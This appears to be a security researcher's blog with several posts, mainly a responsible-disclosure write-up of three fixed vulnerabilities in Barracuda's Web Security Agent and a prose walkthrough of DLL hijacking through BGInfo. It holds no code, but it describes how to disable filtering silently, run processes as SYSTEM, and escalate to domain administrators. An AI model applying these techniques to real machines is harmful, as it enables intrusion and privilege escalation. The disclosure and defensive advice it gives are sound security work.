Wednesday, 18 November 2015

Reinventing The Wheel

WheelIn business, it generally doesn’t make sense to reinvent the wheel. Why spend time and resources developing something that already exists commercially?

For personal development projects, though, it’s a great way to appreciate the amount of work that went into the existing solutions. Plus, it can obviously be customized to behavior however you’d like.

Lately, I’ve been working on a tool to take a domain name, suggest similar names, and then check to see if those sites are active.

The primary use will be in discovering and reporting domains being used for typosquatting or fraud. There are existing tools, like dnstwist, but I figured it might be fun to attempt something similar on my own.

My tool will allow me to define which domains I’m interested in monitoring out of the automatically-suggested list (since some are just super unlikely) and perform periodic checks against them. It’ll also grab a thumbnail image of the site (if a website for the domain exists) and maybe some meta-data… and allow me to add my own notes.

This will let me identify active domains with similar names to the ones I’m interested, but can also exclude sites I’ve identified as being legitimate. By periodically evaluating the registration data, I can also flag domains as needing reviewed. This way, if I identified XYZ.com as legitimate, but then a year later it changes hands, I wouldn’t want to treat it the same as the original XYZ.com that I originally reviewed.

I’m doing it all in my free time. Since I don’t have a whole lot of that these days, things are progressing quite slowly. Still, though… it’s fun. That’s what’s important, right?

Tuesday, 29 September 2015

Catch And Release: Barracuda WSA

fish*** EXECUTIVE SUMMARY ***

While reviewing Barracuda Network’s Web Security Agent, I identified three security vulnerabilities.

Exploitation of these vulnerabilities allow the disclosure and alteration of local WSA settings, shutting down of the WSA service, and local elevation of privilege allowing execution as SYSTEM.

These issues were initially discovered within 4.3.1.53 of WSA. They were responsibly disclosed in early June 2015 and were fully resolved at the end of September, as part of their 4.4.1 release.

*** WALKTHROUGH ***

I’m purposely leaving this details out of this section for now. Developers interested in evaluating the security posture of their applications will hopefully get something out of it, but there’s no reason to rush with the details until users have had a chance to update away from the vulnerable versions. [UPDATE: As of 03/16/2016, details are now included.]

The premise was simple — get around WSA.

There weren’t any obvious results on Google, exploit-db, etc. for known flaws, so I was on my own.

Interacting with the system tray icon for WSA didn’t reveal a whole lot. I noticed that some actions (like Sync or Ping Service Hosts) seemed to briefly turn WSA off and then back on. It was only for a few seconds at most, though. I needed more.

I found the installation location for WSA, hoping it might have some really obvious weaknesses, but nothing really jumped out at me. There was a configuration tool. I decided to start with that.

Some of the applications, including the configuration tool were .NET assemblies. That meant I would be able to utilize ILSpy to see what’s going on behind the scenes, assuming the code hadn’t been obfuscated. Amazingly enough, it wasn’t. The decompiled code was nice and readable.

Immediately, I spotted something. The configuration tool was comparing the password entered by the user matched the value from its settings. Score! If the application was reading the password, that meant I could too.

Loading up the configuration tool and then Visual Studio, both with elevated rights, I was able to attach to the configuration tool’s process. This way, when I tried submitting a password to the tool, I was able to see the password it was being compared against. I then re-ran the configuration tool, entered the password I had just found, and was in. I now had the ability to view and change settings.

It was a start… but requiring admin rights isn’t exactly a ‘bypass’. I wanted to see just how far I could take it.

Thus, the first vulnerability was discovered…

WSA service has decryptable config that is readable by local users (BNSEC-6054)

Using ILSpy, I was able to find the encrypted .INI file that WSA kept all of the settings in. I took a brief look at the library it used, pwe.dll, to figure out how it was encrypting/decrypting the file’s contents. It wasn’t a .NET assembly, so my progress with that didn’t get very far. Thankfully, I realized there was an even easier way…I could just call pwe.dll directly, the same way the WSA executables did.

As a first attempt, I read the file directly through some proof-of-concept code in C#, called the library, and got back a string with all of the settings. Awesome.

Of primary interest, of course, was the configuration password. Given how often users/organizations reuse their passwords, knowing the WSA password could potentially give an attacker leverage against other systems or applications.

Having a list of whitelisted applications was also handy. That provided my first way around WSA. If ‘example.exe’ was whitelisted, I could simply rename my browser, malicious code, or whatever to match that name and WSA wouldn’t try to filter or monitor it. Knowing the IP ranges and domains excluded from filtering could be advantageous, too.

Now that I had a way around WSA if I wanted, I decided to make it harder on myself… Rather than just skirting around the filter, I wanted to see if I could actually mess with it.

That led to my second vulnerability finding….

WSA service allows for arbitrary local reconfiguration at net.tcp://127.0.0.1:32323/ (BNSEC-6053, later absorbed into BNSEC-6147)

ILSpy made things incredibly easy. The service had a listener on 127.0.0.1 and there didn’t seem to be any authentication required. The WSAMonitor app, which runs in the system tray, provided all of the information I needed to take advantage of the listener.

I wrote a bit more code and called net.tcp://127.0.0.1:32323/StopService. The service stopped. Or I guess I should say that the filtering stopped. The windows service was still running. I ultimately had to verify that the stop occurred by looking at log entries in the WSA.log file. I also was able to verify it through a website provided by Barracuda that shows whether or not WSA is filtering traffic. The agent’s icon in the system tray remained unchanged, though, as if it was still connected. This meant WSA could be disabled without the user or an admin noticing.

I also eventually wrote calls to GetSettings and SetSettings, allowing me to more easily read and alter the local WSA settings. Any changes would be reset by the next policy sync, but it gave enough of a window to make the changes I wanted. Changing the password was fun, but I also realized that changing how often service hosts get evaluated helped alleviate some of the issues I had with the program. Setting the interval to -1 disabled the automatic pinging of the hosts, which normally was happening every five minutes.

As much fun as I had trying to find ways around WSA, I knew that if I could find these methods, the ‘bad guys’ could, too.

Though Barracuda has a pretty nice bug bounty program, through BugCrowd, apparently WSA isn’t within its scope. Ultimately, I ended up submitting the issue to CERT’s CVE system and also sent the details via encrypted emails to the Barracuda security team.

A few days after my submission, I took one last look at the WSA code, looking for anything I might have missed.

That’s when I discovered the third vulnerability…

WSA local EoP to SYSTEM via net.tcp://127.0.0.1:32323/Update (BNSEC-6147)

This one was really straight-forward. I think I had glossed by it initially because I was simply focused on evading WSA, rather than exploiting it.

The danger of this routine is that it was too trusting. It accepted a filename and arguments and would execute the process as the service (which runs as SYSTEM). Not good.

As soon as I found it, I reported it the same way as the others. Barracuda was quick to acknowledge the issue and provided a reasonable timeline that it would get fixed.

The fix for this was simple enough. Just remove all of the parameters, so calling Update can only do one thing — run the update.

*** OVERALL EXPERIENCE ***

Throughout the entire process, I couldn’t have asked for a better contact at Barracuda than Justin Kelly. He and the rest of the BNSEC team did a great job keeping me in the loop. Justin provided the perfect blend of professionalism and casualness. It was clear that they were taking things seriously on their end, but I never got the feeling that they were going to go Oracle-style with it with legal threats for picking apart their product a bit. I’m looking forward to working with them more in the future.

Sunday, 27 September 2015

DLL Hijacking

Procmon_BGInfo

I’ve been having a lot of fun recently with DLL Hijacking. It’s been around for quite a few years now and the ‘best practices’ recommended by Microsoft are to fully-qualify the DLL paths.

Quite a lot of applications that don’t do this, however…

Thankfully, the Windows OS has gotten quite a bit smarter over the years when it comes to this sort of thing. They’ve altered the priority of paths being searched, which significantly cut down on the impact to most applications. Additionally, some of their core DLL files are set up in such a way that even if an explicit path is given, it will ignore it in favor of where it knows the ‘good’ copy is.

The MSDN documentation provides some pretty useful information on the way searching happens.

  1. If a DLL with the same module name is already loaded in memory, the system checks only for redirection and a manifest before resolving to the loaded DLL, no matter which directory it is in. The system does not search for the DLL.
  2. If the DLL is on the list of known DLLs for the version of Windows on which the application is running, the system uses its copy of the known DLL (and the known DLL’s dependent DLLs, if any) instead of searching for the DLL. For a list of known DLLs on the current system, see the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.
  3. If a DLL has dependencies, the system searches for the dependent DLLs as if they were loaded with just their module names. This is true even if the first DLL was loaded by specifying a full path.

The first and last items were interesting to me.

But, really, it’s even more simple if the application you’re looking to hijack is installed outside of the usual “Program Files” or “Program Files (x86)” directories. At least when an application is installed in one of those folders, local admin rights are needed to write to them. But if the program is installed to its own folder, plenty of fun can be had…

One such example I’ve had success with in my home environment is BGInfo utility, from Sysinternals. It’s a popular utility with system administrators and generally seems to get installed in C:\bginfo\ (which doesn’t have any built-in protections, by default). It looks like I wasn’t the only one who found it to be a worthwhile target

This allows a custom DLL to be added to the directory (by a tech-savy user, malware, an attacker, etc.) without any special rights being needed.

Using procmon, also by Sysinternals, I was able to see that one of the libraries BGInfo uses is version.dll

I found the legitimate file, made my own DLL with the same name and public methods. All requests made to it get sent over to the appropriate routine in the legitimate version.dll file (so the program continues to work as expected). I also added my own custom payload into the DLL’s initial execution. That payload gets run under the context of the account executing BGInfo.exe

As a proof-of-concept, I simply added a message box. If this had been a real exploit, however, there’s a lot more potential for abuse…

At most organizations, BGInfo gets executed upon login by all users… which includes local administrators and potentially domain administrators. Just let that sink in for a bit… Here’s code provided by a non-admin, malware, etc. and it’s getting automatically executed by an admin. Ouch!

Granted, it’s a bit of a waiting game… but it can allow for some rather easy elevation of privileges… Especially if logins by local administrators happen pretty frequently.

What about if domain admins don’t do local logins? No problem. Use the initial DLL hijacking to execute code for a local admin. From there, additional hijacking for programs commonly used by domain admins (via Run As…) can be done without a whole lot of additional effort.

This can also lead to pass-the-hash attacks, spreading similar attacks to other machines on the network, etc.

All in all… it’s bad news for an enterprise.

Even if no admins (local or otherwise) execute the DLL-hijacked application, it’s still going to have persistent code that launches whenever the program does (which is login, in the case of BGInfo). Probably not ideal.

If there isn’t an obviously-exploitable program in an unprotected directory, though… what then? I’ve had a surprisingly amount of success dropping hijacked DLLs into the current user’s AppData temp directory. Using my same tainted version.dll from earlier, I was able to trigger my ‘rogue code’ during a Notepad++ update. Pretty handy.

The moral of the story is… fully qualify your DLL paths. And even if you do, be aware of potential DLL hijacking through the dependencies of the DLLs you are fully-qualifying. If it can be abused… it probably will be.

Next on my list of techniques to get more familiar with is DLL Injection. Seems like it’ll be a lot of fun, too.

Wednesday, 12 August 2015

The All-Knowing-Oracle

crystal-ballOracle’s CSO, Mary Ann Davidson, provided a wonderful of example of how not to handle having your products reverse engineered.

Her original post has been removed, but there’s a copy of it on Scribd. It’s worth reading, if you haven’t seen it yet.

I think I get where she is coming from, on her original post. If people are using automated static analysis tools to report issues and either it isn’t actually a security issue or it’s something Oracle is already aware of and is working on, I can certainly understand how that might be a drain on their resources and their time could be better spent on finding real issues themselves.

That being said, I can’t believe that a company — especially one the size of Oracle — can think that the “Pay no attention to the man behind the curtain” approach is an effective strategy.

People are going to try to look at your code. Even if not your customers, the ‘bad guys’ certainly will. Taking a stance of “if there’s a security issue, we’ll find it on our own” isn’t helping anyone.

Ultimately, if someone running an automate tools or performing a basic static analysis is able to uncover actual issues in Oracle’s products, that’s stuff Oracle should have found on its own. If it’s mostly false-positives and duplicates that are the issue, Oracle isn’t doing a good job of clearly exposing that to their customers.

I like how Bugcrowd and similar services do it… Companies with a mature security program can define boundaries. There is a monetary incentive to follow the rules and proper procedures. Even if something happens to fall outside the scope of the bug bounty program, they are still likely to have the ability to work with the person to ensure the issue is validated and fixed within a reasonable amount of time.

The biggest downside I see with the current bug-bounty programs is that products not part of the bounty are probably worthwhile targets. The product might not get much attention internally and was simply forgotten about. A vendor might also not list it because they already know/suspect there are a lot of bugs in it. Either way, what isn’t part of a bug bounty program can sometimes be even more interesting than what is… At least if you don’t care about the rewards.

Hopefully Oracle will eventually shift more towards the bug bounty style. As it is now, it seems like they view it as purely an ‘us vs them’ approach. Where bug bounties really shine, though, is when the internal team is able to collaborate with external researchers.

I wonder how much (if any) competitive advantage the SQL Server platform has over Oracle, given the difference in how Microsoft handles the discovery and reporting of issues in their products versus Oracle. Maybe that could be a motivating factor for them to change their approach…

Saturday, 1 August 2015

Books to read in 2015

booksHere are five books I’d recommend checking out, if you haven’t already read them.

  • #1 — The Pragmatic Programmer — This is, by far, one of my favorite development books and I recommend everyone read it at least once.
  • #2 — Gray Hat Hacking – The Ethical Hacker’s Handbook — While not specifically geared towards software development, there are plenty of topics that developers should consider giving some thought to.
  • #3 — Threat Modeling: Designing for Security — Even in eBook format, this book is massive. No matter whether you’re building applications for mobile devices, websites, or desktops, there’s something to be gained from this book.
  • #4 — Official (ISC)2 Guide to the CSSLP CBK — Even if you are not going for the CSSLP certification, there are still some great concepts developers should keep in mind throughout the SDLC.
  • #5 — Job Reconnaissance: Using Hacking Skills to Win the Job Hunt Game — Another one that’s not specifically geared towards developers, but I found the advice to be quite useful. Even if you are a highly technical individual, controlling your ‘brand’ is important. I also like the idea of doing a bit of reconnaissance early on to find specific companies of interest, rather than relying on a company to find you.